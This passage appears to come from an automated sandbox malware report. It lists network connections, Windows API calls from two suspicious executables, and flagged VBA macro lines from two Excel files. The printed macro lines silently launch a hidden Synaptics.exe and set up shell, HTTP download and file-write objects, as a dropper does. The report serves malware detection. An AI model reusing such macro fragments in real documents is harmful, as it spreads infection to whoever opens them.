                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49709 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49710 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49716 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49717 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49720 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49722 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49726 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49728 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49742 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49744 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49745 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49747 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49752 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49754 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49759 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49761 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49766 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49765 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49771 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49772 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49789 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49788 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49835 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49836 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49849 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49850 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49860 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49861 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49885 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49886 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49899 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49924 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49925 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49930 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49931 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49938 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49940 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49949 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49951 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49960 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49966 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49972 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49974 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49974 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49983 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49984 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:50002 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:50004 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:50026 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:50028 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:50045 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:50047 version: TLS 1.2
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007B7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_007B7099
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007B7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_007B7294
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00497294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,9_2_00497294
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007B7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_007B7099
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007A4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,2_2_007A4342
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_007CF5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,9_2_004AF5D0

                              System Summary

                              barindex
                              Document contains an embedded VBA macro with suspicious strings
                              Source: XJVR1Oh1.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: XJVR1Oh1.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: XJVR1Oh1.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: XJVR1Oh1.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: XJVR1Oh1.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: XJVR1Oh1.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: XJVR1Oh1.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: XJVR1Oh1.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: XJVR1Oh1.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: XJVR1Oh1.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: XJVR1Oh1.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: NVWZAPQSQL.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: NVWZAPQSQL.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: NVWZAPQSQL.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: NVWZAPQSQL.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: NVWZAPQSQL.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: NVWZAPQSQL.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: NVWZAPQSQL.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: NVWZAPQSQL.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: NVWZAPQSQL.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: NVWZAPQSQL.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: NVWZAPQSQL.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Document contains an embedded VBA with functions possibly related to ADO stream file operations
                              Source: XJVR1Oh1.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: NVWZAPQSQL.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Document contains an embedded VBA with functions possibly related to HTTP operations
                              Source: XJVR1Oh1.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: NVWZAPQSQL.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                              Source: XJVR1Oh1.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: NVWZAPQSQL.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Windows Scripting host queries suspicious COM object (likely to drop second stage)
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007629C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_007629C2
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007D02AA NtdllDialogWndProc_W,2_2_007D02AA
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CE769 NtdllDialogWndProc_W,CallWindowProcW,2_2_007CE769
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CEA4E NtdllDialogWndProc_W,2_2_007CEA4E
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_007CEAA6
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_007CECBC
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0077AC99 NtdllDialogWndProc_W,2_2_0077AC99
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0077AD5C NtdllDialogWndProc_W,745AC8D0,NtdllDialogWndProc_W,2_2_0077AD5C
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0077AFB4 GetParent,NtdllDialogWndProc_W,2_2_0077AFB4
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_007CEFA8
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CF0A1 SendMessageW,NtdllDialogWndProc_W,2_2_007CF0A1
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_007CF122
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CF37C NtdllDialogWndProc_W,2_2_007CF37C
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CF3DA NtdllDialogWndProc_W,2_2_007CF3DA
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CF3AB NtdllDialogWndProc_W,2_2_007CF3AB
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CF45A ClientToScreen,NtdllDialogWndProc_W,2_2_007CF45A
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CF425 NtdllDialogWndProc_W,2_2_007CF425
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_007CF5D0
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CF594 GetWindowLongW,NtdllDialogWndProc_W,2_2_007CF594
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0077B7F2 NtdllDialogWndProc_W,2_2_0077B7F2
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0077B845 NtdllDialogWndProc_W,2_2_0077B845
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CFE80 NtdllDialogWndProc_W,2_2_007CFE80
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,2_2_007CFF04
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,2_2_007CFF91
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004429C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,9_2_004429C2
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004B02AA NtdllDialogWndProc_W,9_2_004B02AA
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AE769 NtdllDialogWndProc_W,CallWindowProcW,9_2_004AE769
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AEA4E NtdllDialogWndProc_W,9_2_004AEA4E
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,9_2_004AEAA6
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0045AC99 NtdllDialogWndProc_W,9_2_0045AC99
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,9_2_004AECBC
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0045AD5C NtdllDialogWndProc_W,745AC8D0,NtdllDialogWndProc_W,9_2_0045AD5C
